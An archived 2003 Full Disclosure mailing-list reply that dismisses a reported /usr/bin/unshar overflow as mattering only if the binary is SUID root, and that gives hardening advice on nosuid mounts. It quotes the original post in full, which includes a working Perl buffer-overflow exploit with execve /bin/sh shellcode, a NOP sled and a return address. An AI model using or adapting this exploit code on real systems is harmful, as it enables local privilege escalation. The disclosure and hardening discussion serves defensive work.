Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: flames security group start to play , yet another vuln found (rustymemory and welshboi)

From: Todd Burroughs <todd () hostopia com>
Date: Thu, 4 Dec 2003 02:34:07 -0500 (EST)
This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.

You shouldn't have much on your system that is SUID root.  I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job,
after that you will need to add whatever you need to the security.local
file. depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes is easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 3 Dec 2003, KF wrote:


if you are bored .... download unrar.
-KF


rustymemory wrote:


By: flames.bluefox.net.nz
if unshar suid; then you w00t

proof of concept?

rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'`
............................AAAAAAAAAAAAAASegmentation fault

welshboi@flames:~$ more unshar.pl
#!/usr/bin/perl
#/usr/bin/unshar local sploit.
#coded by welshboi (deadbeat)
#found by rustymemory
#
#FLAMES SECURITY GROUP
#Private, please dont distribute
#affects all linux distributions , tested on slackware 9.1 and MDK
###############################################
#[deadbeat@pikachu sploits]$ perl unshar.pl #
# #
#[] /usr/bin/unshar exploit #
#[] coded by: deadbeat [] #
#[] found by: rustymemory [] #
#_f1GWugHu[SPZ #
# #
#sh-2.05b$ #
###############################################
# 47byte shellcode (exec /bin/sh)
$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
$egg = 2000;
$buf = 1128;
$nop = "\x90";
$offset = 0;
$ret =0x40055bdc;
if(@ARGV == 1) {$offset = $ARGV[0];}
$addr = pack('l', ($ret + $offset));
for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
$evil .= $hell;
print "\n[] /usr/bin/unshar exploit []\n";
print "[] coded by: deadbeat, uk2sec []\n";
print "[] found by: rustymemory []\n\n";
print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
system("/usr/bin/unshar -f $evil");

---------------------------------------------------------
shouts to ?

calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest
of flames security group. and rusty's fiancee

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: